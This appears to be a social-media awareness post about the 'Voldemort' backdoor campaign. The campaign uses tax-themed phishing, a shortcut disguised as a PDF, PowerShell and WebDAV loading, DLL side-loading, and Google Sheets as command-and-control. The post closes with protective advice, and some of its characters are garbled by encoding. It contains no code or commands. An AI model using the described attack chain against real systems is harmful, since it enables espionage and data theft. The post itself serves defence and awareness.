Here’s what you need to know about Voldemort Malware, how it operates, and steps you can take to protect yourself.
Another malware campaign has emerged, presenting significant risks to organisations across various sectors worldwide. Researchers have named this sophisticated malware “Voldemort.” It uniquely uses unexpected tools like Google Sheets to execute attacks, making it distinctive and hazardous.
What Is Voldemort Malware?
Voldemort is a custom backdoor malware recently discovered by cybersecurity experts.
Unlike traditional malware, Voldemort utilizes Google Sheets as its command-and-control (C2) mechanism, allowing it to communicate with its operators and receive instructions. This malware has targeted over 70 organizations across various industries, including insurance, finance, healthcare, technology, and government sectors. The campaign behind Voldemort is suspected to be part of a larger cyber espionage effort, although the exact perpetrators remain unidentified.
The Voldemort malware is particularly concerning due to its unconventional approach to spreading and executing malicious code. It impersonates tax authorities from various countriesโincluding the U.S., U.K., and Japanโto trick recipients into clicking on links that appear legitimate but redirect them to a landing page designed to exploit their systems.
How Does Voldemort Malware Work?
The attack begins with phishing emails claiming to be from tax authorities, warning recipients about changes to their tax filings. These emails include links that, when clicked, lead to a webpage that checks whether the victim is using a Windows operating system. If the user is on Windows, the webpage uses a Windows shortcut file disguised as a PDF to initiate the attack.
Once the user is tricked into opening this file, a sequence of commands is triggered. The Windows shortcut file invokes PowerShell, which runs a Python script from a remote server. This script gathers system information and sends it back to the attackers. To avoid detection, the script does not download any files directly onto the victim’s computer. Instead, it loads dependencies from a WebDAV share, a technique that further obscures the attack.
The malware then displays a decoy PDF to the user to maintain the illusion of legitimacy while simultaneously downloading a password-protected ZIP file. This ZIP file contains a legitimate executable vulnerable to DLL side-loading and a malicious DLL, which is the Voldemort malware itself. The malware then exploits Google Sheets to exfiltrate data and execute commands.
The Significance of the Attack
The combination of advanced and basic techniques used by the Voldemort malware is particularly alarming. It employs sophisticated methods, such as abusing Google Sheets for C2 communication, while also relying on simpler tactics like phishing and using legitimate software components to evade detection. This blend of old and new tactics complicates cybersecurity experts’ efforts to fully understand the attackersโ intentions or anticipate their next move.
The campaign appears to be extensive, targeting a wide range of industries and potentially casting a broad net to gather intelligence before zeroing in on specific high-value targets. With over 20,000 phishing emails sent as part of this campaign, the scale of the operation is significant, even though the exact number of successful infections remains unclear.
How to Protect Yourself from Voldemort Malware
While waiting for this malware to be eradicated, it’s essential to limit access to external file-sharing services as much as possible. However, the most effective defense is to strengthen the human factor, which remains a critical weak point exploited by criminals to penetrate organizationsโ systems.
๐ ๐๐ ๐๐๐ฎ๐ญ๐ข๐จ๐ฎ๐ฌ ๐ฐ๐ข๐ญ๐ก ๐๐ฆ๐๐ข๐ฅ ๐๐ข๐ง๐ค๐ฌ: Always verify the authenticity of emails, especially those that claim to be from government agencies or other authoritative bodies.
Avoid clicking on links from unknown or suspicious sources.
๐ ๐๐ฉ๐๐๐ญ๐ ๐๐ง๐ ๐๐๐ญ๐๐ก ๐๐จ๐๐ญ๐ฐ๐๐ซ๐: Ensure all software, particularly security applications, is current.
This includes applying patches for known vulnerabilities that malware could exploit.
๐ ๐๐๐ฎ๐๐๐ญ๐ ๐๐ง๐ ๐๐ซ๐๐ข๐ง ๐๐ฆ๐ฉ๐ฅ๐จ๐ฒ๐๐๐ฌ: Conduct regular hashtag#cybersecuritytraining for employees to recognize hashtag#phishing attempts and other common attack vectors.
๐ ๐๐ฆ๐ฉ๐ฅ๐๐ฆ๐๐ง๐ญ ๐๐๐ฏ๐๐ง๐๐๐ ๐๐๐๐ฎ๐ซ๐ข๐ญ๐ฒ ๐๐๐๐ฌ๐ฎ๐ซ๐๐ฌ: Use powerful threat detection and response tools that can identify and mitigate sophisticated attacks like those involving Voldemort.
Network monitoring, endpoint protection, and intrusion detection systems are essential.
๐ ๐๐๐๐ค๐ฎ๐ฉ ๐๐ซ๐ข๐ญ๐ข๐๐๐ฅ ๐๐๐ญ๐: Regularly back up important data to reduce the impact of a potential malware attack.
Cybercriminals often prepare well-packaged bait designed to deceive victims, typically employees or operators within a company or organization, into clicking on malicious links.
Not falling into this trap is, therefore, the most effective defense. Achieving this outcome requires quality training, including continuous practical exercises and staying updated with the latest security news.
